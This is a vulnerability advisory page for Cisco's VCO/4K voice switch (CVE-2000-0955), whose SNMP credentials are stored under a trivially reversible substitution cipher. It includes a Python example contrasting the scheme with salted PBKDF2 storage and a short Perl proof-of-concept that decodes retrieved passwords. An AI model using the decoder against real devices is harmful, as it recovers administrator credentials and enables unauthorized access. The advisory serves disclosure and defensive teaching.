Cisco CVCO/4k Remote Username and Password Retrieval Vulnerability
BID:1885
Info
| Bugtraq ID: | 1885 |
| Class: | Access Validation Error |
| CVE: | CVE-2000-0955 |
| Remote: | Yes |
| Local: | Yes |
| Published: | Oct 26 2000 12:00AM |
| Updated: | Jul 11 2009 03:56AM |
| Credit: | Reported to bugtraq by "@stake Advisories" <[email protected]> on Thu, 26 Oct 2000. |
| Vulnerable: | Cisco Virtual Central Office 4000 (VCO/4K) 5.1.3 |
| Not Vulnerable: | Cisco Virtual Central Office 4000 (VCO/4K) 5.1.4 |
Discussion
A vulnerability exists in the Cisco Virtual Central Office 4000 (VCO/4K) programmable voice switch running software versions 5.13 and earlier.
The usernames and passwords for the device's SNMP administration interface are protected only by a simple substitution cipher, which is easily defeated. As a result, if the "encrypted" passwords are retrieved (for example, through the read-only community string), an attacker can obtain a list of valid usernames and passwords, potentially allowing an elevation of privileges and possibly more serious consequences.
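The following added example (not part of the original advisory and not Cisco's code) checks why this scheme gives no confidentiality and contrasts it with salted one-way storage. The constant 164 comes from the script in the Exploit / POC section; the function names, the sample string and the PBKDF2 parameters are assumptions, and the page does not say how 5.1.4 changed the storage.

```python
import hashlib
import hmac
import os

CONSTANT = 164  # taken from the Perl script on this page


def vco_transform(text: str) -> str:
    """Apply c -> chr(164 - ord(c)); the same call encodes and decodes."""
    codes = [CONSTANT - ord(ch) for ch in text]
    if any(code < 0 for code in codes):
        raise ValueError("character outside the range the transform covers")
    return "".join(chr(code) for code in codes)


def repeat_pattern(text: str) -> list[int]:
    """Index of each character's first occurrence; exposes repeated characters."""
    return [text.index(ch) for ch in text]


def weakness_report(sample: str) -> dict[str, bool]:
    """Properties that make the stored value equivalent to plaintext."""
    stored = vco_transform(sample)
    return {
        "self_inverse": vco_transform(stored) == sample,
        "length_preserved": len(stored) == len(sample),
        "deterministic_no_salt": stored == vco_transform(sample),
        "repeats_visible": repeat_pattern(stored) == repeat_pattern(sample),
    }


def store_password(password: str, iterations: int = 600_000) -> tuple[bytes, bytes]:
    """Hardened storage (general practice): random salt + PBKDF2-HMAC-SHA256."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = 600_000) -> bool:
    """Recompute the digest and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    sample = "Passw0rd-constructed"  # constructed sample, not a real credential
    print(weakness_report(sample))
    salt, digest = store_password(sample)
    print(verify_password(sample, salt, digest), store_password(sample)[1] != digest)
```

Every property in the report holds for any input because the transform has no key and no salt, whereas two calls to `store_password` on the same password yield different digests.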
Exploit / POC
<--- cut here --->
#!/usr/bin/perl
# Obfuscates or de-obfuscates a VCO/4K password; the transform is its own inverse.
use strict;
use warnings;

print "Cisco VCO/4K Password [De]Obfuscator\n";
print "\t\@stake, Inc.\n";
print "\tRex Warren, Brian Carrier, David Goldsmith\n";
print "Enter Password: ";
my $pw = <STDIN>;
chomp $pw;    # strip only the trailing newline
print "Result: ";
# Each character c is replaced by chr(164 - ord(c)).
for (my $pos = 0; $pos < length($pw); $pos++) {
    print chr(164 - ord(substr($pw, $pos, 1)));
}
print "\n";
<--- cut here --->